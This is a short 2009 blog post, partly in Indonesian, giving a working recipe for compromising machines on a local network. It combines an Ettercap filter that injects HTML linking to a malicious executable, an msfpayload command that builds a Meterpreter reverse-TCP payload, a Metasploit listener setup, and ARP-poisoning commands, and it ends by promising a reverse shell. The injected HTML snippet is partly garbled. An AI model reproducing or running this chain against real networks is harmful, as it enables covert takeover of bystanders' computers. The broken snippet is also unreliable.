Deploying Metasploit's Meterpreter with MITM and an Ettercap filter
Posted by Archon at 6/22/2009 11:06:00 PMif (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "")) {
replace("", "
action="http://192.168.1.6/meterpeter.exe" method="link">
http://192.168.1.6/alert.gif">
<
msg("html injected");
}}
-menciptakan meterpeter.exe -
(open msfconsole)
../msfpayload windows/meterpeter/reverse_tcp LHOST=192.168.1.6
LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory
mengkonfigurasi-listener -
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 100
-jalankan ettercap -
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //
sekarang menunggu beberapa satu pada jaringan untuk men-download dan menjalankan meterpeter.exe
dan Anda akan memiliki reverse shell